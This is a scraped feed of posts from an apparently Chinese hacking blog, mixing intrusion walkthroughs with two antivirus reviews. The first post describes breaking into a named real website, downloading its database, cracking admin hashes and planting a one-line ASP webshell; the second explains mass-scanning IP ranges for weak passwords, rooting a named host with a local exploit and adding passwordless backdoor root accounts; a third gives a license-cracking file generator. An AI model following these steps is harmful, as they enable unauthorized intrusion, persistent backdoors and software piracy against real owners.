连接~两分钟后发现shell不见了。。。难道被管理员发现了?再上传。。。再不见。。原来是杀软。。这webshell还是免杀的。。太变态的杀毒软件了吧。。。
提权。?。失败了。。。真的没什么思路。serv-u等第三方软件都没安装。。就安装安全软件。c d e 都不可读。那我们的最开始目标呢?难道不要那源码了?
绕啊绕啊绕回来
郁闷 继续看原来的站。http://www.059466.com/ 哦。前台还有留言板。那manage下面为什么没。难道还有真正的后台不成?这是假的》?http://www.059466.com/admin_login.asp 晕。随便看下真的还有。。。这个难办了。没账号密码…
在留言板我看到一张图片。一个细节,决定这次的成功。



高贝留言???解释是?高贝声音留言?? - -显然不是。这应该是一个cms吧。百度下载。




果然。。。找到默认数据库。database\gaobeisys_v1x.mdb



访问目标站。
晕了。改数据库了?这时我注意到database\gaobeisys_v1x.mdb
v1x.mdb 1.0的版本?那如果他用2.0呢 不就是database\gaobeisys_v2x.mdb
…果然。!



用迅雷下载~啦啦啦啦啦啦。。。本地看密码.跑md5。。耶。出来了、
进后台发


现这系统够强大。



有数据库备份~太好了。按照我们常规的思路就是上传图片马,备份生成asp。好。不过又是一个难题。



竟然是空白页面。



看来upload.asp被管理员删除了。。。这下郁闷了。不过有数据库备份我们可以通过插一句话来。通过查看高贝的源文件。我发现一个重要文件。\include\gaobei_setup.asp





和后台的系统几本设置一样。就是保存在asp文件。这样我们就有机可乘!
<%
gaobei_title= "高贝系统 v 2.0"
我们把高贝系统 v 2.0替换成 “%><%execute request(“f**k”)<%gaobei_f**k=”这样就完全闭合了。然后用一句话连接\include\gaobei_setup.asp.成了!(这步感谢小帅给我那个laker2最小马。郁闷了很久!也鄙视他改主页 =_=)…
进入后我随便看了下发现有个bbs/的目录,看文件结构是phpwind.我们看下其数据库
data/sql_config.php



这时我突然想到一个问题。就是我们购买虚拟机的时候,ftp的账号和mysql账号密码都是一致的!包括虚拟机的管理页面…果然 登陆ftp成功



有ftp..要啥有啥。。嘿嘿。。。
好了好了。。。就是这样了。总结下。
1. 由于第一次找了一个错误的低功能的后台让我走错了路,旁注失败。服务器权限太死。谁有兴趣提权的找我吖!
2. 在旁注过程中看到了一个不算很新的密码加密算法。md5后取前十位,可以借鉴。毕竟现在md5破解弱智密码很简单。如果取前十位。那就难了。
3. http://www.huayi2008.com/chinese/index.asp 看到友情连接,链接到sc/目录。导致此站点的崩溃。
4. 提权-失败。服务器开启3389端口
5. 回到原点,认真看前台,发现功能强大,假后台功能弱小。
6. 看cms的图片分辨出是用哪个cms系统。(这点非常好用!因为你可以改cms的文字,但是有些管理员懒得改图片,要ps掉 版权。以前也用过!)然后通过版本得到数据库路径。
7. 在去掉上传文件的情况下通过一句话得到webshell。最后打包下载。
8. 最后通过查看phpwind的mysql配置文件,得到了ftp的账号密码。
阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 02:53 http://hi.baidu.com/52hack/blog/item/d6b07389b4d582ba0e24446e.html <![CDATA[Linux之肉鸡扫描篇(图)]]>

另外还需要一个VNC的Linux版本,头一次得到自己的Linux肉鸡,当然要看看它的桌面了。工具基本齐全了,下面首先请出Ssport这个强大的、特别适合新手入侵者使用的扫描器。程序界面如图1所示。


图1

软件的中部位置有端口设置,我们添加如下端口22,23,512,513,514。程序上方有IP段落设置,既然想得到大量Linux肉鸡,范围不防设置大点,211.0.0.1_211.255.255.255(脚本小子:记得在自己比较稳定的3389肉鸡上扫描,自己的机器可舍不得啊,太费电了吧?)。

经过好几天的等待,终于扫描结束了。其实Ssport非常方便,中途你觉得差不多的时候,可以保存部分结果进行下一步动作。让这个工具继续扫描时候,它不但从原先的结束点开始,还会问你是把扫描的结果剪除后继续扫描,还是不删除原先的结果扫描,很体贴的。将结果导出为一个文本文件,我们需要简单处理。如图2所示。

图2

选择替换把22、23、512、513、514全部处理掉,就会得到一个干净的IP地址列表。下面就需要我们的第二个工具HSCAN出场了。程序的界面如图3所示。

图3

我们依次选Menu菜单->Pamareter子菜单->Hostlist,把我们刚才整理的IP地址文本导入,还要记得把Ping host before scan选项给去掉,这样可以多得到些信息,不过花费的时间更长。

扫描范围选择好了,再来选择扫描模块,Modules在这里我们选择Check ftp weak accounts、Check pop3 weak accounts和Check imap weak accounts三个模块,开始扫描吧!最终HSCAN会给我们一份扫描报告。如图4所示。

图4

看清楚了么?我们仔细的看这份报告。对于发现了弱口令,且关于FTP、POP、IMAP版本有WU-FTP、VSFTP、PROFTP和Linux、Unix字样的肯定就是Linux系统。看到了报告吗?61.197.254.149这个IP就有弱口令,它的FTP版本是WU-<?xml:namespace prefix = st1 />2.6.2.5,肯定是一个Linux系统。

现在我们要想办法登陆上它的系统,这时候用我们的第三个工具Putty。如果你还保存有IP地址的原始数据,就是刚刚用SSPORT扫描后还带有端口信息的那个文本,我们就可以查到61.197.254.149这个IP开放的端口信息,它的22端口是开放的。这正好方便我们,打开PUTTY,填写IP61.197.254.149,选择SSH协议,点击打开。过一会儿会弹出如图5所示的界面。

图5

我们只要点YES就会出现登陆提示,按照扫描出来的弱口令点登陆就连接到对方主机上了。如图6所示。

图6

输入命令Uname –a查看内核版本,一般版本都不高,给大家推荐一个好的本地溢出代码,我们先在命令提示下输入Cat >1.c,然后选择复制这段代码,粘贴到肉鸡上。如图8所示。

图8

然后用Ctrl z键这段代码就被保存在肉鸡上了。下面我们编译它,输入命令“gcc -o 1 1.c”,如图9所示。

图9

然后执行这个命令,哈哈,看到了么?所有的ID为0,提示符变成了#号,我们已经是管理员了!如图10所示。

图10

加个自己的用户吧:

mkdir /home/.network

echo network::500:500::/home/.network:/bin/bash>>/etc/passwd

echo network::::::::>>/etc/shadow

passwd network

加个管理员以后方便自己:

echo xctc::::::::>>/etc/shadow

echo xctc::0:0::/home/.network:/bin/bash>>/etc/passwd

passwd xctc

如图11所示。

图11

好了,入侵告一段落。

相信很多菜鸟都很渴望看到Linux的桌面。那么我们就给他安装VNC吧,因为它是跨平台的,而且客户端访问可以在浏览器里面进行。安装方法很简单:

tar zxvf vnc-3.3.3r1_x86_linux_2.0.tgz 
cd vnc_x86_linux_2.0 
cp *vnc* /usr/local/bin/ 
mkdir /usr/local/vnc 
cp -r classes/ /usr/local/vnc/ 
设置Vnc Server的访问密码: 
vncpasswd 
启动Vnc Server:
vncserver
安装好后有时候不能看到漂亮的Linux桌面,需要我们执行下面命令的任何一个,Startkde或者Gnome-session,这两命令一个是启动到KDE桌面,一个是启动到GNOME桌面。先给大家一个截图诱惑大家一下吧!这可是在Windows下控制Linux哦!如图12所示。

图12

阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 02:51 http://hi.baidu.com/52hack/blog/item/fb6e4154efa0505d574e006e.html <![CDATA[实例破解Tegoweb程序(图)]]> 破解过程。

首先用PEID检测一下有没有壳

结果明显,没有壳,而且是采用VB编写的。

用W32DSM反汇编看一下吧。要静态分析当然要知道软件对错误注册码的一些反应啊,于是打开软件注册页面,郁闷~~!都输入了N长的数字了,旁边的注册按钮怎么还没亮起来?

有点郁闷,突然脑子里有了一个想法---WINDOWS按钮突破专家!可是在自己的计算机上找了半天也没找到,不怕,我机器上还有一款----激活专家。抱着试试看的心理对软件开始操作,没想到奇迹出现了,注册成功了

就这样我们已经很轻松的破了Tegoweb这个软件,但是本人还是想深入点看看这个软件到底是怎么样注册的,于是就有了下文。

用W32DSM打开软件,根据2条信息来分析

Product Order Info... 这个是未注册时软件的显示

Registration Info... 这个是注册后软件的显示

根据这个提示我找到了如下地址

修改这个跳转后并没有达到破解软件的目的,通过ollydbg跟踪后分析此软件的注册码校验流程如下:

获取安装目录下的Reg.rg文件

读取文件中的注册码、用户名、公司信息,将3个信息加在一起

读取最后一行的注册日期与前面的信息加在一起(从这里可以看出,软件是根据用户的信息和时间来计算注册值的)

对前面的所有信息进行计算得出一个值,然后与第一行的数值比较。(上面发现的跳转就是这个跳转,也就是说,修改这个跳转后,不会达到破解目的,只能达到注册文件中的信息被修改后仍然可以注册)

到这里基本知道这个软件是如何确认注册的,由于本人没有学过汇编,看不懂他的算法,5555~~~可怜啊,难道不会汇编就不能写出注册机吗?非也!瞧下面,咱也写出了一个小模小样的“注册机”。

#include

#include

#include

main()

{

FILE *fpout;

char *cmp= 8627;

char *number=I LOVE YOU;

char *name=EvilHsu;

char *company=[E.S.T];

char *time=2004-12-13 15:43:06;

printf(######Tegoweb 注册文件生成器######\n\n);

printf(请将本软件放在 Tegoweb 的安装目录下);

if((fpout=fopen(Reg.rg,w))==NULL) printf(Can’t output file!\n);

else

{

fprintf(fpout,%s\n,cmp);

fprintf(fpout,%s\n,number);

fprintf(fpout,%s\n,name);

fprintf(fpout,%s\n,company);

fprintf(fpout,%s\n,time);

破解Tegoweb结束了!

阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 02:50 http://hi.baidu.com/52hack/blog/item/0557ce5cb6bbde4afaf2c06e.html <![CDATA[优秀的安全软件AVG简体中文版教程(图)]]>
  AVG简体中文免费版信息



(图:1 AVG简体中文免费版)

  AVG Anti-Virus Free Edition,Grisoft公司产品。

  来自捷克,自1992年成立以来,已有着十几年杀毒软件开发的经验,它的安全产品广泛地被欧美以及大洋洲地区使用。它得到了ICA实验室认证。它的产品不仅有专业版,也有为向个人用户提供的免费版。



(图:2 AVG简体中文免费版信息)

    AVG简体中文免费版安装篇

  AVG的安装过程很简单,且现在已经不存在语言障碍了,安装过程就不再赘述!详见缩略图。



(图:3 AVG简体中文免费版的安装缩略图)

  在安装过程中如果在使用MS Word的话,AVG会提示予以关闭!按要求关闭即可进行下一步的安装。



(图:4 AVG简体中文免费版的安装)

  AVG简体中文免费版首次运行向导

  还有个首次运行向导,一共有8步,可以帮助你设定最佳的保护和易用性。



(图:5 AVG简体中文免费版首次运行向导)

  第二步:计划定期扫描和更新



(图:6 AVG简体中文免费版首次运行向导)

  第三步:帮助AVG识别新的威胁(即样本上报)



(图:7 AVG简体中文免费版首次运行向导)

  第四步:配置AVG security toolbar(将搜索引擎更改为雅虎yahoo搜索引擎)



(图:8 AVG简体中文免费版首次运行向导)

  第五步:更新AVG防护软件



(图:9 AVG简体中文免费版首次运行向导)

第六步:更新文件







(图:10 AVG简体中文免费版首次运行向导)

  第七步:注册AVG Anti-virus Free



(图:11 AVG简体中文免费版首次运行向导)

  第八步:AVG防护配置完成。



(图:12 AVG简体中文免费版首次运行向导)



(图:13 AVG简体中文免费版首次运行向导)

  安装结束后无需重启电脑。

  安装文件大小对比

  安装文件65.7MB,占用空间65.7MB;安装后大小47.0MB,占用空间50.3MB。



(图:14 AVG简体中文免费版按准过前后文件大小对比)

  总结:

  AVG简体中文免费版8.5的安装控制的很不错!安装源文件达到65.7MB大小,而安装后的文件仅47.0MB。安装文件的缩小意味着更少的资源占用。

  AVG简体中文免费版功能了解篇

  AVG简体中文免费版8.5的界面一如既往地简洁!功能也和英文版没有任何区别,只不过汉化了而已。

  概述

  安全组件和状态的详细情况一目了然。



(图:15 AVG简体中文免费版概述功能)

  计算机扫描器



(图:16 AVG简体中文免费版计算机扫描器功能)

  立即更新



(图:17 AVG简体中文免费版自动更新功能)

  总结:

  AVG简体中文免费版8.5和AVG Anti-Virus Free 8.5并无改观!无论是功能上讲还是UI设计上,改变的只是支持简体中文而已。 阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 02:48 http://hi.baidu.com/52hack/blog/item/21a2a1ece590ee2e63d09f6e.html <![CDATA[绿色免费恶意软件查杀工具(图)]]>   恶意软件查杀助理可以帮助您查杀超过1000多款恶意软件、木马病毒插件,找出隐匿在系统中的毒手!本软件纯绿色,无需安装,完全免费,不捆绑任何插件!特征库支持在线升级,以查杀更多、更新的木马病毒插件。每个月我们都会至少升级两次特征库,请及时升级!

点击此处下载最新版恶意软件查杀助理

一、绿色免费恶意软件查杀助理 资料:

二、绿色免费恶意软件查杀助理 特点:
  
  1.全新查杀引擎:新版恶意软件查杀助理采用全新改进查杀引擎,即使病毒正在运行,无需进入强制删除模式即可直接将其删除,扫描更彻底!

图1 程序设置选项

  2.全新的界面:新版恶意软件查杀助理采用全新改进的界面,操作更加直观方便!
  
  3.启动检查系统设置:新版恶意软件查杀助理在启动过程中将自动检查系统中超过200多处电脑设置,并提供修复功能。

图2 系统修复模块

  4.变名库查杀功能:新版恶意软件查杀助理将更加全面的查找恶意软件!查杀效率更高!

图3 查杀木马

  5.更快速查杀:新版恶意软件查杀助理采用全新查杀引擎,查杀速度更快!

图4 扫描过程非常快速

  6.增强的辅助工具:新版恶意软件查杀助理增强辅助工具,查杀速度更快,误报更低!

图5 辅助查杀模块

  7.增强的广谱查杀功能:新版恶意软件查杀助理采用增强的广谱查杀功能,增强查杀捆绑软件,以及对各种病毒残余文件进行扫描。

图6 广谱扫描模块

  8.全新智能升级:新版恶意软件查杀助理采用采用全新的升级功能,不再只升级特征库,可以对软件包进行完整升级,可以帮助您把软件保持在最新版本,

图7 在线升级功能按钮

三、绿色免费恶意软件查杀助理 功能:
1.系统设置检测与修复:
  
  新版恶意软件查杀助理在启动过程中将自动检查中超过200多项系统设置,如果检测到系统设置不正确,将用红字在界面上进行显示,如图所示。

图8 扫描系统设置提供修复选项

  恶意软件查杀助理对检测到的不正确的系统设置提供了修复功能,用户可以单击“立即修复”按钮进入系统修复模块,在此进行对不正确的系统设置的修复操作,但是系统修复操作需要用户另行下载Windows贴心助手,如图所示,目前Windows贴心助手的最新版本为V10.0,下载地址为:http://www.newhua.com/soft/61624.htm

图9 系统修复功能需要下载使用Windows贴心助手

2.恶意软件扫描与清理
  
  恶意软件查杀助理可以帮助用户检测并清理系统内感染的恶意软件、木马病毒插件等系毒瘤。用户可以通过单击主界面上的“立即扫描”按钮立即扫描系统检测查杀恶意软件,扫描过程如图所示。

图10 检测到恶意软件

图11 提示启用深度扫描

图12 深度扫描进行中

3.智能在线升级
  
  新版恶意软件查杀助理采用采用全新的升级功能,不再只升级特征库,可以对软件包进行完整升级,可以帮助您把软件保持在最新版本,

图13 选择最佳升级服务器

图14 在线升级中

4.精确扫描
  
  恶意软件查杀助理调用恶意软件查杀工具辅助执行更多针对恶意软件和流行木马的精确扫描服务,能有效解决恶意软件和木马引起的残留,程序提供了系统扫描、注册表扫描、深度扫描、自定义扫描等实用功能,下图所示为恶意软件查杀工具的自定义扫描模块,用户在此可以具体指定需要扫描的位置。

图15 调用恶意软件查杀工具

图16 具体指定扫描区域

  另外,恶意软件查杀工具还提供了病毒文件提取与隐藏文件显示功能,用户可以利用这个小工具提取指定文件出来上报,或者将很多隐藏的病毒文件显示出来,如图所示。

图17 病毒文件提取与隐藏文件显示

小 结:
  
  恶意软件查杀助理是一款纯绿色并且完全免费的安全辅助工具,能够帮助用户清理各种流行的木马病毒等恶意插件,还您电脑一片纯净!相对其他同类软件,恶意软件查杀助理不用安装,方便好用,如果你正在被恶意软件所困扰,赶快下载恶意软件查杀助理用用吧!
阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 02:46 http://hi.baidu.com/52hack/blog/item/438d8a026f2c29064afb516d.html